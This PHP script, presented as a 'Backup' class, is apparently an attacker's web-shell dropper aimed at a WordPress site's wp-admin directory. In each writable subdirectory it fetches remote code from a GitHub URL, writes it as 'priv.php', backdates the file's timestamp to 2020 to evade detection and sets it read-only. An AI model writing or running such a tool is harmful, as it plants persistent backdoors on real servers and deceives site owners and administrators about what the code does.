<?php
    

    //Author by xpl0dec- BhinnekaTech
    class Backup {
        

        function setTime() {
            $d = DateTime::createFromFormat('d-m-Y H:i:s', '22-09-2020 00:00:00');
            
            if ($d === false) {
                die("Date salah!");
            } else {
                return $d->getTimestamp();
            }   
        }

        function recursive_directory($dir) {

           $tree = glob(rtrim($dir, '/') . '/*');
           $isDirectory = false;
            
            foreach($tree as $sc) {  
              if(is_dir($sc)){
                $isDirectory = true;
                $this->recursive_directory($sc);
              }   
           }

           if(!$isDirectory && is_writable($dir)) {
              $random_name = "priv.php";
              $content = file_get_contents("https://raw.githubusercontent.com/notif77/cus/main/cas");
              file_put_contents($dir . "/" . $random_name, $content);
              touch($dir . "/" . $random_name, $this->setTime());
              chmod($dir . "/" . $random_name, 0444);
              echo "Success Backup : " . $dir . "/" . $random_name;
              echo "<br>";
           }

        }

    }


$directory = getcwd();
$instance = new Backup;
$instance->recursive_directory("/home/sastraminang/public_html/wp-admin/css/colors/");

?>
